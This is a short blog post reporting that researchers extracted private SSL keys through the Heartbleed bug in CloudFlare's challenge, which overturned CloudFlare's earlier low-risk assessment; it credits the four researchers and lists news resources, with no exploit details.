Heartbleed exposes privates

Heartbleed

This is as serious as it gets. Heartbleed exposes your corporate private keys. Your crown jewels, your keys to the castle….well you get the idea. Your corporate privates are indeed exposed, they may not have been stolen yet, but they are unequivocally exposed through Heartbleed. It took researches less than 3 hours to extract private keys from a server as a result of a challenge issued by CloudFare.

Last week, CloudFlare provided a level-headed statement that the likelihood of extracting private keys was very low.

We think the stealing private keys on most NGINX servers is at least extremely hard and, likely, impossible. Even with Apache, which we think may be slightly more vulnerable, and we do not use at CloudFlare, we believe the likelihood of private SSL keys being revealed with the Heartbleed vulnerability is very low. That’s about the only good news of the last week.

CloudFlare subsequently setup a test web server and issued a challenge that was quickly met by at least four researchers.  In The Results of the CloudFlare Challenge, the author, Nick Sullivan, rightly states:

This result reminds us not to underestimate the power of the crowd and emphasizes the danger posed by this vulnerability.

Congratulations to the following security experts for ensuring that the IT community continues to take this issue seriously:

  1. Software Engineer Fedor Indutny.
  2. Ilkka Mattila at NCSC-FI
  3. Rubin Xu, PhD student, Cambridge University
  4. Ben Murphy, Security Researcher

Your work has changed our collective thinking of  Heartbleed’s private key exposure from “very low” to “dangerous.”

Useful resources:

  1. PC World: Tests confirm Heartbleed bug can expose server’s private key.
  2. Answering the Critical Question: Can You Get Private SSL Keys Using Heartbleed?
  3. Results of the CloudFlare Challenge